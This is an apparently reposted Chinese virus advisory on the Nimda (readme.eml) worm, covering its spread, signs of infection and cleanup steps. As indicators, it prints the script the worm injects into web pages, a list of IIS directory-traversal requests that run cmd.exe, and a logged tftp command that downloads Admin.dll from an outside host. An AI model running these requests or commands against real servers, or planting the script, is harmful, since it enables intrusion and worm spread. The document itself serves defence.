readme.eml病毒的特征及其处理方法

病毒的特征和解决方法。  
  一、攻击的目标系统:    
   
  该病毒可以感染Windows   95,   98,   ME,   NT,或者2000   ,以及   Windows   NT   and   2000服务器。    
   
  二、传播方式:    
   
  1、通过邮件传播出,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK   EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经执行了。    
   
  2、利用了IIS的漏洞,采用与“红色代码II”和“蓝色代码”类似的方式,  
          通过网络传播。    
   
  3、通过局域网的共享传播到其他系统。    
   
  4、感染EXE文件。    
   
  5、在html、asp文件中插入如下内容:    
   
  <html><scriptlanguage="JavaScript">window.open("readme.eml",   null,    
   
  "resizable=no,top=6000,left=6000")</script></html>    
   
            使得用户浏览感染病毒的网站时,导致用户感染此病毒。    
  三、如何判定感染Nimda蠕虫病毒      
   
   
   
  1、感染此病毒的NT和2000服务器,在WINNT/SYSTEM32/LOGFILES/W3SVC1目录下的    
   
   日志文件中含有以下内容    
   
   GET   /scripts/root.exe?/c+dir    
   
   GET   /MSADC/root.exe?/c+dir    
   
   GET   /c/winnt/system32/cmd.exe?/c+dir    
   
   GET   /d/winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir    
   
   GET        
   
   /msadc/..%5c../..%5c../..%5c/../xc1/x1c../../xc1/x1c../../xc1/x1c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/../xc1/x1c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/../xc0/../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/../xc0/xaf../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/../xc1/x9c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/..%35c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/..%35c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir    
   
   GET   /scripts/..%2f../winnt/system32/cmd.exe?/c+dir    
   
   GET,   /scripts/..%5c../winnt/system32/cmd.exe    
   
   如果日志存在以下内容,则表明该系统已受到感染,    
   
   /c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:/Admin.dll    
   
       
   
  2、感染病毒的Windows   NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws   的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:/admin.dll、   d:/admin.dll),其文件长度为56K(57344字节)   。在system目录下存在mmc.exe文件   ,文件长度也为56K。在c:/innetpub/scripts目录下存在tftpxxx的文件。这些都是病毒   代码。    
   
  3、Windows   9X系统中的system.ini文件内容被修改    
   
   正常情况为:Shell   =   explorer.exe    
   
   感染病毒后变为:Shell   =   explorer.exe   load.exe   -dontrunold        
   
  4、在Windows   9x系统下,存在如下文件load.exe、   riched20.dll,这些文件都是系统的   ,隐含的属性,需要修改文件   。磁盘的可写目录中存在很多后缀为eml的文件。    
   
  5、感染病毒的系统中,在c:/tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这   些都是病毒代码。    
   
       
   
  四、解决方案   :    
   
  1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。    
   
  2、下载安装补丁程序    
   
  对于安装IIS的NT/2000服务器,要下载安装如下补丁:    
   
  http://www.microsoft.com/technet/security/bulletin/MS01-044.asp    
   
          对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:    
   
  Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp    
   
  3、Windows   9x系统需要将system.ini中的Shell   =   explorer.exe   load.exe   -dontrunold    改为    
   
    Shell   =   explorer.exe    
   
  4、删除wininit.ini文件中的内容。        
   
  5、用干净的   Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。    
   
  6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。    
   
  7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省   设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检   测、清除所有文件。    
   
  8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描   述的病毒文件。如果没有则表明已清除病毒。    
   
  9、NT/2000用户还需检查在WINNT/SYSTEM32/LOGFILES/W3SVC1目录下的日志文件中是否还含有以下内容    
   
  GET   /scripts/root.exe?/c+dir    
   
  GET   /MSADC/root.exe?/c+dir    
   
  GET   /c/winnt/system32/cmd.exe?/c+dir    
   
  GET   /d/winnt/system32/cmd.exe?/c+dir    
   
  GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir    
   
  GET   /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir    
   
  GET   /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir    
   
  10、安装了邮件防病毒网关的邮件服务器要及时进行升级,可有效防止病毒从邮件传播。    
   
  如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。请将日志文件发给我中心,以协助我们通知其他感染病毒的用户。    
   
  计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向,目前,已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值